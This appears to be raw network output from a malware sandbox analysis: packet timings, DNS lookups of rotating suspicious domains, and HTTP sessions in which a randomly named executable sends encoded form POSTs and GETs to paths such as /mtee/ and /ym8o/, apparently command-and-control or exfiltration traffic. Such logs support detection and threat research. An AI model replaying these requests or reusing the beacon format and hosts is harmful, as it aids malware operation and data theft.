                                                    Sep 11, 2024 15:45:15.961313009 CEST4973580192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:15.966291904 CEST8049735136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:15.966490984 CEST8049735136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:16.561054945 CEST8049735136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:16.561572075 CEST8049735136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:16.565320015 CEST4973580192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:17.472382069 CEST4973580192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:18.491441965 CEST4973680192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:18.496872902 CEST8049736136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:18.499530077 CEST4973680192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:18.506221056 CEST4973680192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:18.511070013 CEST8049736136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:19.102969885 CEST8049736136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:19.102997065 CEST8049736136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:19.103013992 CEST8049736136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:19.103034019 CEST8049736136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:19.103050947 CEST8049736136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:19.103069067 CEST8049736136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:19.103157043 CEST4973680192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:19.103157043 CEST4973680192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:19.107315063 CEST4973680192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:19.112272024 CEST8049736136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:24.133219957 CEST4973780192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:24.138183117 CEST80497373.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:24.138247967 CEST4973780192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:24.147454977 CEST4973780192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:24.152344942 CEST80497373.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:24.599735975 CEST80497373.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:24.607311964 CEST4973780192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:25.659859896 CEST4973780192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:25.664896011 CEST80497373.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:26.681296110 CEST4973880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:26.689619064 CEST80497383.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:26.689800978 CEST4973880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:26.701293945 CEST4973880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:26.706336021 CEST80497383.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:27.165951967 CEST80497383.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:27.173316002 CEST4973880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:28.206747055 CEST4973880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:28.212194920 CEST80497383.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:29.227559090 CEST4973980192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:29.232785940 CEST80497393.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:29.235426903 CEST4973980192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:29.247443914 CEST4973980192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:29.252499104 CEST80497393.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:29.252616882 CEST80497393.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:29.705252886 CEST80497393.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:29.705431938 CEST4973980192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:30.755539894 CEST4973980192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:30.760777950 CEST80497393.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:31.773075104 CEST4974080192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:31.778292894 CEST80497403.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:31.778486013 CEST4974080192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:31.785795927 CEST4974080192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:31.790734053 CEST80497403.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:32.246546984 CEST80497403.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:32.246604919 CEST80497403.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:32.246680975 CEST4974080192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:32.249156952 CEST4974080192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:32.257416010 CEST80497403.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:37.277419090 CEST4974180192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:37.282449961 CEST80497413.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:37.283512115 CEST4974180192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:37.295428038 CEST4974180192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:37.300415993 CEST80497413.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:37.768537998 CEST80497413.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:37.768600941 CEST4974180192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:38.802884102 CEST4974180192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:39.049478054 CEST80497413.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:39.820318937 CEST4974280192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:39.825649023 CEST80497423.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:39.825720072 CEST4974280192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:39.844402075 CEST4974280192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:39.849615097 CEST80497423.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:40.319170952 CEST80497423.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:40.319231033 CEST4974280192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:41.347321987 CEST4974280192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:41.352593899 CEST80497423.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:42.365686893 CEST4974380192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:42.371066093 CEST80497433.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:42.371125937 CEST4974380192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:42.380361080 CEST4974380192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:42.385263920 CEST80497433.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:42.385437012 CEST80497433.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:42.835117102 CEST80497433.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:42.837363005 CEST4974380192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:43.894187927 CEST4974380192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:43.899532080 CEST80497433.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:44.913341999 CEST4974480192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:44.919445992 CEST80497443.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:44.919991016 CEST4974480192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:44.929357052 CEST4974480192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:44.937222004 CEST80497443.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:46.317312956 CEST80497443.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:46.317351103 CEST80497443.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:46.317471981 CEST4974480192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:46.320610046 CEST4974480192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:46.333163977 CEST80497443.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:51.355577946 CEST4974580192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:51.360547066 CEST80497453.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:51.361439943 CEST4974580192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:51.373349905 CEST4974580192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:51.379177094 CEST80497453.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:51.828578949 CEST80497453.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:51.828653097 CEST4974580192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:52.879426956 CEST4974580192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:52.885312080 CEST80497453.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:53.896794081 CEST4974680192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:53.901942015 CEST80497463.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:53.902014971 CEST4974680192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:53.913382053 CEST4974680192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:53.918402910 CEST80497463.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:54.358490944 CEST80497463.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:54.358551025 CEST4974680192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:55.427449942 CEST4974680192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:55.432624102 CEST80497463.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:56.444474936 CEST4974780192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:56.450062037 CEST80497473.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:56.450182915 CEST4974780192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:56.461873055 CEST4974780192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:56.466862917 CEST80497473.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:56.467061996 CEST80497473.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:57.836535931 CEST80497473.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:57.836606979 CEST4974780192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:57.972316980 CEST4974780192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:57.977499962 CEST80497473.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:58.991553068 CEST4974880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:58.996695042 CEST80497483.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:58.999560118 CEST4974880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:59.003318071 CEST4974880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:59.008301973 CEST80497483.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:59.501399994 CEST80497483.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:59.501554012 CEST80497483.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:59.503595114 CEST4974880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:59.504357100 CEST4974880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:59.509198904 CEST80497483.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:46:04.610897064 CEST4974980192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:04.616861105 CEST8049749199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:04.616947889 CEST4974980192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:04.625808954 CEST4974980192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:04.630923986 CEST8049749199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:05.086605072 CEST8049749199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:05.086668015 CEST8049749199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:05.086708069 CEST8049749199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:05.086752892 CEST4974980192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:05.086802959 CEST4974980192.168.2.8199.59.243.226
                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                    Sep 11, 2024 15:43:04.660456896 CEST | 192.168.2.8 | 1.1.1.1 | 0x34b | Standard query (0) | epsys.ro | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:43:59.497880936 CEST | 192.168.2.8 | 1.1.1.1 | 0x2989 | Standard query (0) | www.coffee-and-blends.info | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:44:15.444056034 CEST | 192.168.2.8 | 1.1.1.1 | 0x42a4 | Standard query (0) | www.mayawashfold.net | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:44:28.615825891 CEST | 192.168.2.8 | 1.1.1.1 | 0xa0ca | Standard query (0) | www.zz82x.top | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:44:43.131700993 CEST | 192.168.2.8 | 1.1.1.1 | 0xd824 | Standard query (0) | www.wcm50.top | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:44:57.163443089 CEST | 192.168.2.8 | 1.1.1.1 | 0xcbc3 | Standard query (0) | www.withad.xyz | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:45:10.523432970 CEST | 192.168.2.8 | 1.1.1.1 | 0xe54d | Standard query (0) | www.lanxuanz.tech | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:45:24.116507053 CEST | 192.168.2.8 | 1.1.1.1 | 0x84fa | Standard query (0) | www.filelabel.info | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:45:37.259437084 CEST | 192.168.2.8 | 1.1.1.1 | 0x99e5 | Standard query (0) | www.comrade.lol | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:45:51.337347984 CEST | 192.168.2.8 | 1.1.1.1 | 0xf4e4 | Standard query (0) | www.takitoon.xyz | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:46:04.522720098 CEST | 192.168.2.8 | 1.1.1.1 | 0x9fce | Standard query (0) | www.pmjjewels.online | A (IP address) | IN (0x0001) | false
                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                    Sep 11, 2024 15:43:04.937227011 CEST | 1.1.1.1 | 192.168.2.8 | 0x34b | No error (0) | epsys.ro | - | 89.42.218.72 | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:43:59.525485039 CEST | 1.1.1.1 | 192.168.2.8 | 0x2989 | No error (0) | www.coffee-and-blends.info | - | 217.160.0.231 | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:44:15.482511044 CEST | 1.1.1.1 | 192.168.2.8 | 0x42a4 | No error (0) | www.mayawashfold.net | mayawashfold.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                                    Sep 11, 2024 15:44:15.482511044 CEST | 1.1.1.1 | 192.168.2.8 | 0x42a4 | No error (0) | mayawashfold.net | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:44:15.482511044 CEST | 1.1.1.1 | 192.168.2.8 | 0x42a4 | No error (0) | mayawashfold.net | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:44:29.549361944 CEST | 1.1.1.1 | 192.168.2.8 | 0xa0ca | No error (0) | www.zz82x.top | zz82x.top | - | CNAME (Canonical name) | IN (0x0001) | false
                                                    Sep 11, 2024 15:44:29.549361944 CEST | 1.1.1.1 | 192.168.2.8 | 0xa0ca | No error (0) | zz82x.top | - | 38.47.232.196 | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:44:43.557353973 CEST | 1.1.1.1 | 192.168.2.8 | 0xd824 | No error (0) | www.wcm50.top | wcm50.top | - | CNAME (Canonical name) | IN (0x0001) | false
                                                    Sep 11, 2024 15:44:43.557353973 CEST | 1.1.1.1 | 192.168.2.8 | 0xd824 | No error (0) | wcm50.top | - | 154.23.184.60 | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:44:57.196774006 CEST | 1.1.1.1 | 192.168.2.8 | 0xcbc3 | No error (0) | www.withad.xyz | - | 162.0.238.43 | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:45:10.849666119 CEST | 1.1.1.1 | 192.168.2.8 | 0xe54d | No error (0) | www.lanxuanz.tech | zhs.zohosites.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                    Sep 11, 2024 15:45:10.849666119 CEST | 1.1.1.1 | 192.168.2.8 | 0xe54d | No error (0) | zhs.zohosites.com | - | 136.143.186.12 | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:45:24.130772114 CEST | 1.1.1.1 | 192.168.2.8 | 0x84fa | No error (0) | www.filelabel.info | filelabel.info | - | CNAME (Canonical name) | IN (0x0001) | false
                                                    Sep 11, 2024 15:45:24.130772114 CEST | 1.1.1.1 | 192.168.2.8 | 0x84fa | No error (0) | filelabel.info | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:45:24.130772114 CEST | 1.1.1.1 | 192.168.2.8 | 0x84fa | No error (0) | filelabel.info | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:45:37.273042917 CEST | 1.1.1.1 | 192.168.2.8 | 0x99e5 | No error (0) | www.comrade.lol | comrade.lol | - | CNAME (Canonical name) | IN (0x0001) | false
                                                    Sep 11, 2024 15:45:37.273042917 CEST | 1.1.1.1 | 192.168.2.8 | 0x99e5 | No error (0) | comrade.lol | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:45:37.273042917 CEST | 1.1.1.1 | 192.168.2.8 | 0x99e5 | No error (0) | comrade.lol | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:45:51.349747896 CEST | 1.1.1.1 | 192.168.2.8 | 0xf4e4 | No error (0) | www.takitoon.xyz | takitoon.xyz | - | CNAME (Canonical name) | IN (0x0001) | false
                                                    Sep 11, 2024 15:45:51.349747896 CEST | 1.1.1.1 | 192.168.2.8 | 0xf4e4 | No error (0) | takitoon.xyz | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:45:51.349747896 CEST | 1.1.1.1 | 192.168.2.8 | 0xf4e4 | No error (0) | takitoon.xyz | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                    Sep 11, 2024 15:46:04.608807087 CEST | 1.1.1.1 | 192.168.2.8 | 0x9fce | No error (0) | www.pmjjewels.online | - | 199.59.243.226 | A (IP address) | IN (0x0001) | false
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.8 | 49713 | 217.160.0.231 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:43:59.548059940 CEST | 368 | OUT | GET /v35v/?dD=3XyH6pjxGLhPK&7FhphPx8=QLykxYh4zvA0eVm/xmgK7YOftMTq5+WaLw1iNOUTi/NZcFg0+k6SoYLj+BPGFkyr7e2u2NP+bwB2tUbtyEagHZeSqjZTmkHziwyHhfbKN4nr0Mmvp+QBtaJQgZEcDG5b/A== HTTP/1.1
                                                    Host: www.coffee-and-blends.info
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:44:00.402527094 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Content-Type: text/html
                                                    Content-Length: 1271
                                                    Connection: close
                                                    Date: Wed, 11 Sep 2024 13:44:00 GMT
                                                    Server: Apache
                                                    X-Frame-Options: deny
                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                    Sep 11, 2024 15:44:00.402632952 CEST | 203 | IN |
                                                    Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    1 | 192.168.2.8 | 49714 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:44:15.501636982 CEST | 622 | OUT | POST /mtee/ HTTP/1.1
                                                    Host: www.mayawashfold.net
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.mayawashfold.net
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.mayawashfold.net/mtee/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=rKAU51PlKtlo7UZdGTRzM2ieCrQaoncZnz2l6ebmOVc2bMoK14oBTeB+cENDkreL1QtPQ0MwhvVLSZQKv0lkJxq8dtDYQJojZnvMtcP4tSbCuElAZc4eCf3crdKV9Gj3jszafKPy85z7W4SFWXsx+ropJLCneW55Ecove3TZ4TtJEa3zctqRz7cSTPcgSFS7SrWUn+g=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    2 | 192.168.2.8 | 49715 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:44:18.038295031 CEST | 642 | OUT | POST /mtee/ HTTP/1.1
                                                    Host: www.mayawashfold.net
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.mayawashfold.net
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.mayawashfold.net/mtee/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=rKAU51PlKtlo51pdF0lzJWide7QahHcVnzKl6c2rOjE2as4Ky9cBSeB+TkNGqLec1QwwQ0AwhvRLSYgKvHNnIhqEI9CedpojZnvMtcaXtSDCvwhAY94dev3bj9KV3mj7jsz4fLjc8837W5iFWGsu3rpiErDYfmN3FtM6YRPDg1luFsaZGPiXw705TM0WXyPTIIGk5p3h89dIp1fMwV/VoJQaqCYW


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    3 | 192.168.2.8 | 49716 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:44:20.586918116 CEST | 1659 | OUT | POST /mtee/ HTTP/1.1
                                                    Host: www.mayawashfold.net
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.mayawashfold.net
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.mayawashfold.net/mtee/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8= [TRUNCATED]


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    4 | 192.168.2.8 | 49719 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:44:23.130845070 CEST | 362 | OUT | GET /mtee/?7FhphPx8=mIo06BHEAes+1ktUHg9aZX/pKZMQjyZWlUKS3fumHCh/F9Apz5MmN8cCaSJUq7K+1FNCT10frPNoaLR8s0NWGBCBd7fYdbgwZQXT0szxpSzoohttWdsUK9P7gt6l1VyO9A==&dD=3XyH6pjxGLhPK HTTP/1.1
                                                    Host: www.mayawashfold.net
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:44:23.607688904 CEST | 413 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Wed, 11 Sep 2024 13:44:23 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 273
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7FhphPx8=mIo06BHEAes+1ktUHg9aZX/pKZMQjyZWlUKS3fumHCh/F9Apz5MmN8cCaSJUq7K+1FNCT10frPNoaLR8s0NWGBCBd7fYdbgwZQXT0szxpSzoohttWdsUK9P7gt6l1VyO9A==&dD=3XyH6pjxGLhPK"}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    5 | 192.168.2.8 | 49721 | 38.47.232.196 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:44:29.566473961 CEST | 601 | OUT | POST /ym8o/ HTTP/1.1
                                                    Host: www.zz82x.top
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.zz82x.top
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.zz82x.top/ym8o/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=5qpOuAz3f4GKORx46hSvnJl5VcQoj9R/RHqE4SbedCPNjTci+wrZ8/Rclrx70W/0UdRPRR2UBjbWzZnsrkD0IEK5EGpmodej0WntP4VYsbBunDwSY9v8RKrLSxJGGXKzMviXPm6DJIB1vhbuqhgEa2VqC1cfaRDieDCirCnt4wXfbNwJYDTcxX+13mbkGrjEzuRq9Q0=
                                                    Sep 11, 2024 15:44:30.511773109 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:30 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    6 | 192.168.2.8 | 49722 | 38.47.232.196 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:44:32.114779949 CEST | 621 | OUT | POST /ym8o/ HTTP/1.1
                                                    Host: www.zz82x.top
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.zz82x.top
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.zz82x.top/ym8o/
